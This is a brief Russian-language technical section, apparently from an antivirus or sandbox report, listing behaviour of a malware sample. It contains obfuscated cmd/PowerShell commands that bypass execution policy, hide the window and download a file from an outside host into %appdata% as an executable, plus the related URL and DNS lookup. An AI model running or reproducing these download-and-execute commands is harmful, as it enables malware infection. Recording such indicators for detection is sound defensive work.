Техническая информация
- http://folueopa.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "POwER^shEl^l.eX^e^ ^-ExecUT^I^OnP^Ol^icy^ ^bYPAsS ^-N^o^pRo^File -WIND^owSTY^le Hid^d^en ^(n^e^w^-O^b^je^CT^ SyS^TeM.^Net.W^e^bC^l^i^E^nT)^.DoWnL^o^ADFI^lE('http://folueopa.top/re...
- DNS ASK fo###opa.top
- '<SYSTEM32>\cmd.exe' /C "POwER^shEl^l.eX^e^ ^-ExecUT^I^OnP^Ol^icy^ ^bYPAsS ^-N^o^pRo^File -WIND^owSTY^le Hid^d^en ^(n^e^w^-O^b^je^CT^ SyS^TeM.^Net.W^e^bC^l^i^E^nT)^.DoWnL^o^ADFI^lE('http://folueopa.top/re...' (со скрытым окном)